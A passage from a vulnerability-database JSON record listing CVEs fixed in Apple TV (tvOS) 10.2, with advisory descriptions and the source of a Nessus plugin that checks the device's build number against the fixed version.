"CVE-2017-5204", "CVE-2016-7926", "CVE-2016-7939", "CVE-2016-7924", "CVE-2017-2449", "CVE-2017-6974", "CVE-2017-2421", "CVE-2017-2427", "CVE-2016-7974", "CVE-2017-5029", "CVE-2017-2410", "CVE-2017-2482", "CVE-2017-2477", "CVE-2016-10159", "CVE-2017-2458", "CVE-2016-7992", "CVE-2017-2448", "CVE-2016-10012", "CVE-2017-2401", "CVE-2017-2409", "CVE-2016-7932", "CVE-2016-8740", "CVE-2017-2413", "CVE-2017-2408", "CVE-2017-5202", "CVE-2017-2467", "CVE-2016-5387", "CVE-2016-7938", "CVE-2016-7984", "CVE-2017-2490", "CVE-2017-5483", "CVE-2016-9586", "CVE-2017-2407", "CVE-2017-2438", "CVE-2016-7973", "CVE-2017-2426", "CVE-2017-2436", "CVE-2017-2473", "CVE-2016-10161", "CVE-2017-2403", "CVE-2017-2416", "CVE-2017-5482", "CVE-2016-7929", "CVE-2016-7940", "CVE-2016-7923", "CVE-2016-7925", "CVE-2016-9533", "CVE-2017-2398", "CVE-2017-2440", "CVE-2016-10158", "CVE-2016-7927", "CVE-2016-0736", "CVE-2017-5485", "CVE-2017-2425", "CVE-2017-2429", "CVE-2017-2432", "CVE-2016-7933", "CVE-2017-2478"], "modified": "2017-08-29T02:52:03", "id": "APPLE:HT207615", "href": "https://support.apple.com/kb/HT207615", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T12:37:22", "description": "According to its banner, the version of Apple TV on the remote device is prior to 10.2. It is, therefore, affected by multiple vulnerabilities :\n\n - An out-of-bounds read error exists in LibTIFF in the DumpModeEncode() function within file tif_dumpmode.c.\n An unauthenticated, remote attacker can exploit this to crash a process linked against the library or disclose memory contents. (CVE-2016-3619)\n\n - An out-of-bounds read error exists in WebKit when handling certain JavaScript code. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when handling certain regular expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to exhaust available memory resources. (CVE-2016-9643)\n\n - An information disclosure vulnerability exists in WebKit when handling page loading due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to disclose data cross-origin.\n (CVE-2017-2367)\n\n - A buffer overflow condition exists in the Carbon component when handling specially crafted DFONT files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2017-2379)\n\n - An information disclosure vulnerability exists in WebKit when handling unspecified exceptions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose data cross-origin. (CVE-2017-2386)\n\n - A flaw exists in the libarchive component due to the insecure creation of temporary files. A local attacker can exploit this, by using a symlink attack against an unspecified file, to cause unexpected changes to be made to file system permissions. (CVE-2017-2390)\n\n - Multiple memory corruption issues exist in WebKit that allow an unauthenticated, remote attacker to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in the Kernel component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a denial of service condition or the execution or arbitrary code. (CVE-2017-2401)\n\n - Multiple memory corruption issues exist in the FontParser component when handling font files due to improper validation of certain input. An unauthenticated, remote attacker can exploit these to cause a denial condition or the execution of arbitrary code. (CVE-2017-2406, CVE-2017-2407, CVE-2017-2487)\n\n - An unspecified type confusion error exists in WebKit that allows an unauthenticated, remote attacker to execute arbitrary code by using specially crafted web content. (CVE-2017-2415)\n\n - A memory corruption issue exists in the ImageIO component, specifically in the GIFReadPlugin::init() function, when handling image files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted image file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2416)\n\n - An infinite recursion condition exists in the CoreGraphics component when handling image files. An unauthenticated, remote can exploit this, via a specially crafted image file, to cause a denial of service condition. (CVE-2017-2417)\n\n - An unspecified flaw exists related to nghttp2 and LibreSSL. An unauthenticated, remote attacker can exploit this, by convincing a user to access a malicious HTTP/2 server, to have an unspecified impact on confidentiality, integrity, and availability.\n (CVE-2017-2428)\n\n - A type confusion error exists in the Audio component when parsing specially crafted M4A audio files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2017-2430)\n\n - An integer overflow condition exists in the ImageIO component when handling JPEG files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2432)\n\n - A memory corruption issue exists in the CoreText component when handling font files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2435)\n\n - An out-of-bounds read error exists in the FontParser component when handling font files. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to disclose process memory.\n (CVE-2017-2439)\n\n - An integer overflow condition exists in the Kernel component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code with kernel-level privileges. (CVE-2017-2440)\n\n - A use-after-free error exists in libc++abi when demangling C++ applications. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code. (CVE-2017-2441)\n\n - A memory corruption issue exists in WebKit within the CoreGraphics component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frame objects due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions that are called from built-in strict mode scripts not being properly restricted from calling sensitive native functions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose memory contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in the Security component due to improper validation of OTR packets under certain conditions. A man-in-the-middle attacker can exploit this to disclose and optionally manipulate transmitted data by spoofing the TLS/SSL server via a packet that appears to be valid. (CVE-2017-2448)\n\n - An out-of-bounds read error exists in CoreText component when handling font files. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to disclose process memory. (CVE-2017-2450)\n\n - A buffer overflow condition exists in the Security component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code with root root privileges. (CVE-2017-2451)\n\n - A race condition exists in the Kernel component when handling memory using the 'mach_msg' system call. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code with root privileges.\n CVE-2017-2456)\n\n - An buffer overflow condition exists in the Keyboards component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2458)\n\n - A denial of service vulnerability exists in the CoreText component when handling specially crafted text messages due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to exhaust available resources on the system.\n (CVE-2017-2461)\n\n - A heap buffer overflow condition exists in the Audio component when parsing specially crafted M4A audio files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary code.\n (CVE-2017-2462)\n\n - An memory corruption issue exists in the ImageIO component when handling specially crafted files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2017-2467)\n\n - A use-after-free error exists in the Kernel component in the XNU port actions extension due to improper handling of port references in error cases. An local attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2472)\n\n - A signedness error exists in the Kernel component in the SIOCSIFORDER IOCTL due to improper validation of certain input. A local attacker can exploit this to cause an out-of-bounds read and memory corruption, resulting in a denial of service condition or the execution of arbitrary code with kernel-level privileges.\n (CVE-2017-2473)\n\n - A off-by-one overflow condition exists in the Kernel component in the SIOCSIFORDER IOCTL due to improper validation of certain input. A local attacker can exploit this to cause a heap-based buffer overflow, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2474)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frames due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2475)\n\n - A race condition exists in the Kernel component in the necp_open() function when closing files descriptors due to improper handling of proc_fd locks. A local attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2478)\n\n - A use-after-free error exists in WebKit when handling ElementData objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2481)\n\n - A heap buffer overflow condition exists in the Kernel component within the Berkeley Packet Filter (BPF) BIOCSBLEN IOCTL due to improper validation of certain input when reattaching to an interface. A local attacker can exploit this to cause a denial of service condition or the execution of arbitrary code with kernel-level privileges. (CVE-2017-2482)\n\n - An off-by-one error exists in the Kernel component, specifically in the audit_pipe_open() function, when handling auditpipe devices due to improper validation of certain input. A local attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code with kernel-level privileges. (CVE-2017-2483)\n\n - An unspecified memory corruption issue exists in the Security component when parsing X.509 certificates due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2485)\n\n - A double-free error exists in the Kernel component due to FSEVENTS_DEVICE_FILTER_64 IOCTL not properly locking devices. A local attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code with elevated privileges. (CVE-2017-2490)\n\n - A use-after-free error exists in JavaScriptCore when handling the String.replace() method. An unauthenticated, remote attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability exists in JavaScriptCore due to an unspecified prototype flaw. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code in a user's browser session.\n (CVE-2017-2492)\n\nNote that only 4th generation models are affected by these vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-04-10T00:00:00", "type": "nessus", "title": "Apple TV < 10.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_10_2.NASL", "href": "https://www.tenable.com/plugins/nessus/99264", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99264);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-3619\",\n \"CVE-2016-9642\",\n \"CVE-2016-9643\",\n \"CVE-2017-2367\",\n \"CVE-2017-2379\",\n \"CVE-2017-2386\",\n \"CVE-2017-2390\",\n \"CVE-2017-2394\",\n \"CVE-2017-2395\",\n \"CVE-2017-2396\",\n \"CVE-2017-2401\",\n \"CVE-2017-2406\",\n \"CVE-2017-2407\",\n \"CVE-2017-2415\",\n \"CVE-2017-2416\",\n \"CVE-2017-2417\",\n \"CVE-2017-2428\",\n \"CVE-2017-2430\",\n \"CVE-2017-2432\",\n \"CVE-2017-2435\",\n \"CVE-2017-2439\",\n \"CVE-2017-2440\",\n \"CVE-2017-2441\",\n \"CVE-2017-2444\",\n \"CVE-2017-2445\",\n \"CVE-2017-2446\",\n \"CVE-2017-2447\",\n \"CVE-2017-2448\",\n \"CVE-2017-2450\",\n \"CVE-2017-2451\",\n \"CVE-2017-2454\",\n \"CVE-2017-2455\",\n \"CVE-2017-2456\",\n \"CVE-2017-2458\",\n \"CVE-2017-2459\",\n \"CVE-2017-2460\",\n \"CVE-2017-2461\",\n \"CVE-2017-2462\",\n \"CVE-2017-2464\",\n \"CVE-2017-2465\",\n \"CVE-2017-2466\",\n \"CVE-2017-2467\",\n \"CVE-2017-2468\",\n \"CVE-2017-2469\",\n \"CVE-2017-2470\",\n \"CVE-2017-2472\",\n \"CVE-2017-2473\",\n \"CVE-2017-2474\",\n \"CVE-2017-2475\",\n \"CVE-2017-2476\",\n \"CVE-2017-2478\",\n \"CVE-2017-2481\",\n \"CVE-2017-2482\",\n \"CVE-2017-2483\",\n \"CVE-2017-2485\",\n \"CVE-2017-2487\",\n \"CVE-2017-2490\",\n \"CVE-2017-2491\",\n \"CVE-2017-2492\"\n );\n script_bugtraq_id(\n 85919,\n 94554,\n 94559,\n 97130,\n 97131,\n 97132,\n 97134,\n 97137,\n 97143,\n 97146,\n 97301,\n 98316\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-6\");\n\n script_name(english:\"Apple TV < 10.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 10.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An out-of-bounds read error exists in LibTIFF in the\n DumpModeEncode() function within file tif_dumpmode.c.\n An unauthenticated, remote attacker can exploit this\n to crash a process linked against the library or\n disclose memory contents. (CVE-2016-3619)\n\n - An out-of-bounds read error exists in WebKit when\n handling certain JavaScript code. An unauthenticated,\n remote attacker can exploit this to cause a denial of\n service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when\n handling certain regular expressions. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted web page, to exhaust available memory\n resources. (CVE-2016-9643)\n\n - An information disclosure vulnerability exists in WebKit\n when handling page loading due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this to disclose data cross-origin.\n (CVE-2017-2367)\n\n - A buffer overflow condition exists in the Carbon\n component when handling specially crafted DFONT files\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2379)\n\n - An information disclosure vulnerability exists in WebKit\n when handling unspecified exceptions. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to disclose data\n cross-origin. (CVE-2017-2386)\n\n - A flaw exists in the libarchive component due to the\n insecure creation of temporary files. A local attacker\n can exploit this, by using a symlink attack against an\n unspecified file, to cause unexpected changes to be made\n to file system permissions. (CVE-2017-2390)\n\n - Multiple memory corruption issues exist in WebKit that\n allow an unauthenticated, remote attacker to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2017-2394, CVE-2017-2395,\n CVE-2017-2396, CVE-2017-2454, CVE-2017-2455,\n CVE-2017-2459, CVE-2017-2460, CVE-2017-2464,\n CVE-2017-2465, CVE-2017-2466, CVE-2017-2468,\n CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in the Kernel component\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a denial of service condition or\n the execution or arbitrary code. (CVE-2017-2401)\n\n - Multiple memory corruption issues exist in the FontParser\n component when handling font files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit these to cause a denial condition\n or the execution of arbitrary code. (CVE-2017-2406,\n CVE-2017-2407, CVE-2017-2487)\n\n - An unspecified type confusion error exists in WebKit\n that allows an unauthenticated, remote attacker to\n execute arbitrary code by using specially crafted web\n content. (CVE-2017-2415)\n\n - A memory corruption issue exists in the ImageIO\n component, specifically in the GIFReadPlugin::init()\n function, when handling image files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted image\n file, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-2416)\n\n - An infinite recursion condition exists in the\n CoreGraphics component when handling image files. An\n unauthenticated, remote can exploit this, via a\n specially crafted image file, to cause a denial of\n service condition. (CVE-2017-2417)\n\n - An unspecified flaw exists related to nghttp2 and\n LibreSSL. An unauthenticated, remote attacker can\n exploit this, by convincing a user to access a malicious\n HTTP/2 server, to have an unspecified impact on\n confidentiality, integrity, and availability.\n (CVE-2017-2428)\n\n - A type confusion error exists in the Audio component\n when parsing specially crafted M4A audio files due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2430)\n\n - An integer overflow condition exists in the ImageIO\n component when handling JPEG files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2432)\n\n - A memory corruption issue exists in the CoreText\n component when handling font files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2435)\n\n - An out-of-bounds read error exists in the FontParser\n component when handling font files. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted file, to disclose process memory.\n (CVE-2017-2439)\n\n - An integer overflow condition exists in the Kernel\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to execute arbitrary code with kernel-level\n privileges. (CVE-2017-2440)\n\n - A use-after-free error exists in libc++abi when\n demangling C++ applications. An unauthenticated, remote\n attacker can exploit this, by convincing a user to run a\n specially crafted application, to execute arbitrary\n code. (CVE-2017-2441)\n\n - A memory corruption issue exists in WebKit within the\n CoreGraphics component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frame objects due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to execute arbitrary\n script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions\n that are called from built-in strict mode scripts not\n being properly restricted from calling sensitive native\n functions. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when\n handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted web content, to disclose memory\n contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in the Security component due\n to improper validation of OTR packets under certain\n conditions. A man-in-the-middle attacker can exploit\n this to disclose and optionally manipulate transmitted\n data by spoofing the TLS/SSL server via a packet that\n appears to be valid. (CVE-2017-2448)\n\n - An out-of-bounds read error exists in CoreText component\n when handling font files. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to disclose process memory. (CVE-2017-2450)\n\n - A buffer overflow condition exists in the Security\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this,\n by convincing a user to run a specially crafted\n application, to execute arbitrary code with root\n root privileges. (CVE-2017-2451)\n\n - A race condition exists in the Kernel component when\n handling memory using the 'mach_msg' system call. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a heap-based buffer overflow,\n resulting in a denial of service condition or the\n execution of arbitrary code with root privileges.\n CVE-2017-2456)\n\n - An buffer overflow condition exists in the Keyboards\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2017-2458)\n\n - A denial of service vulnerability exists in the\n CoreText component when handling specially crafted text\n messages due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n exhaust available resources on the system.\n (CVE-2017-2461)\n\n - A heap buffer overflow condition exists in the Audio\n component when parsing specially crafted M4A audio files\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted file, to execute arbitrary code.\n (CVE-2017-2462)\n\n - An memory corruption issue exists in the ImageIO\n component when handling specially crafted files due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2467)\n\n - A use-after-free error exists in the Kernel component in\n the XNU port actions extension due to improper handling\n of port references in error cases. An local attacker can\n exploit this to deference already freed memory,\n resulting in the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2472)\n\n - A signedness error exists in the Kernel component in the\n SIOCSIFORDER IOCTL due to improper validation of certain\n input. A local attacker can exploit this to cause an\n out-of-bounds read and memory corruption, resulting in\n a denial of service condition or the execution of\n arbitrary code with kernel-level privileges.\n (CVE-2017-2473)\n\n - A off-by-one overflow condition exists in the Kernel\n component in the SIOCSIFORDER IOCTL due to improper\n validation of certain input. A local attacker can exploit\n this to cause a heap-based buffer overflow, resulting in\n the execution of arbitrary code with kernel-level\n privileges. (CVE-2017-2474)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frames due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2475)\n\n - A race condition exists in the Kernel component in the\n necp_open() function when closing files descriptors due\n to improper handling of proc_fd locks. A local attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2478)\n\n - A use-after-free error exists in WebKit when handling\n ElementData objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2481)\n\n - A heap buffer overflow condition exists in the Kernel\n component within the Berkeley Packet Filter (BPF)\n BIOCSBLEN IOCTL due to improper validation of certain\n input when reattaching to an interface. A local attacker\n can exploit this to cause a denial of service condition\n or the execution of arbitrary code with kernel-level\n privileges. (CVE-2017-2482)\n\n - An off-by-one error exists in the Kernel component,\n specifically in the audit_pipe_open() function, when\n handling auditpipe devices due to improper validation of\n certain input. A local attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2483)\n\n - An unspecified memory corruption issue exists in the\n Security component when parsing X.509 certificates due\n to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2485)\n\n - A double-free error exists in the Kernel component due\n to FSEVENTS_DEVICE_FILTER_64 IOCTL not properly locking\n devices. A local attacker can exploit this to corrupt\n memory, resulting in the execution of arbitrary code\n with elevated privileges. (CVE-2017-2490)\n\n - A use-after-free error exists in JavaScriptCore when\n handling the String.replace() method. An\n unauthenticated, remote attacker can exploit this to\n deference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in JavaScriptCore due to an unspecified prototype\n flaw. An unauthenticated, remote attacker can exploit\n this, via a specially crafted web page, to execute\n arbitrary code in a user's browser session.\n (CVE-2017-2492)\n\nNote that only 4th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207601\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00007.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b1dbb626\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 10.2 or later. Note that this update is\nonly available for 4th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2490\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\nfixed_build = \"14W265\";\ntvos_ver = '10.2';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE,\n xss : TRUE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:41:24", "description": "Versions of Apple TV earlier than 10.2 are affected by multiple vulnerabilities :\n\n - An unspecified flaw exists related to 'nghttp2' and 'LibreSSL' that is triggered during the handling of a malicious HTTP/2 server. This may allow an attacker to have multiple unspecified impacts. (CVE-2017-2428)\n - A type confusion flaw exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2430)\n - A use-after-free flaw exists in 'libc++' that is triggered when demangling C++ applications. This may allow a malicious application to dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2441)\n - A flaw exists as OTR packets are not properly validated. By spoofing the TLS/SSL server via a packet that appears valid, an attacker with the ability to intercept network traffic (e.g. MitM, DNS cache poisoning) can disclose and optionally manipulate transmitted data. (CVE-2017-2448)\n - An overflow condition exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to cause a heap-based buffer overflow, potentially allowing execution of arbitrary code. (CVE-2017-2462)\n - An unspecified flaw exists that is triggered as certain input is not properly validated when parsing X.509 certificates. This may allow a context dependent-attacker to corrupt memory and potentially execute arbitrary code.\n\nAdditional flaws exist in the following components :\n\n - Carbon (CVE-2017-2379)\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417, CVE-2017-2444)\n - CoreText (CVE-2017-2435, CVE-2017-2450, CVE-2017-2461)\n - FontParser (CVE-2017-2406, CVE-2017-2407, CVE-2017-2439, CVE-2017-2487)\n - ImageIO (CVE-2017-2416, CVE-2017-2432, CVE-2017-2467)\n - Kernel (CVE-2017-2401, CVE-2017-2440, CVE-2017-2456, CVE-2017-2472, CVE-2017-2473, CVE-2017-2474, CVE-2017-2478, CVE-2017-2482, CVE-2017-2483, CVE-2017-2490)\n - Keyboards (CVE-2017-2458)\n - libarchive (CVE-2017-2390)\n - Security (CVE-2017-2451)\n - Webkit (CVE-2017-2367, CVE-2017-2378, CVE-2017-2386, CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405, CVE-2017-2415, CVE-2017-2419, CVE-2017-2424, CVE-2017-2433, CVE-2017-2442, CVE-2017-2445, 